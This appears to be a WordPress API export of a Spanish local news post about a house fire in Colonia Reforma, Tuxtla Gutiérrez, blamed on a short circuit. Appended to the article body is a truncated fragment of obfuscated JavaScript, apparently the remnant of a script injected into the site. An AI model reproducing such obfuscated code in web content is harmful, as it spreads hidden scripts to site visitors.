{"id":1085,"date":"2022-04-06T00:23:26","date_gmt":"2022-04-06T00:23:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1085"},"modified":"2022-04-06T00:23:27","modified_gmt":"2022-04-06T00:23:27","slug":"se-incendia-casa-en-la-colonia-reforma","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1085","title":{"rendered":"Se incendia casa en la Colonia Reforma"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1086\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036-1024x576.jpg\" alt=\"\" class=\"wp-image-1086\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0036.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1087\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037-1024x768.jpg\" alt=\"\" class=\"wp-image-1087\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220405-WA0037.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 5 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales fue el saldo de un incendio ocurrido este martes en una vivienda localizada en la Colonia Reforma.<\/p>\n\n\n\n<p>Los datos oficiales dieron a conocer que, cerca de las 9 de la ma\u00f1ana se report\u00f3 por parte de los vecinos que, el inmueble se estaba quemando.<\/p>\n\n\n\n<p>Vecinos llamaron a la puerta en diferentes ocasiones pero no hab\u00eda ocupantes.<\/p>\n\n\n\n<p>Los bomberos arribaron a la casa localizada en la 1a Sur, entre 1a y 2a Oriente y con herramienta abrieron el port\u00f3n para sofocar el siniestro.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que el fuego fue ocasionado por un corto circuito.<\/p>\n\n\n\n<p>Polic\u00edas acordonaron el \u00e1rea para que a la llegada de los propietarios se tuviera un balance de da\u00f1os.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 5 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales fue el saldo de un incendio ocurrido este martes en una vivienda localizada en la Colonia Reforma. Los datos oficiales dieron a conocer que, cerca de las 9 de la ma\u00f1ana se report\u00f3 por parte de los vecinos que, el inmueble &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1086,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1085","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1085","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1085"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1085\/revisions"}],"predecessor-version":[{"id":1088,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1085\/revisions\/1088"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1086"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}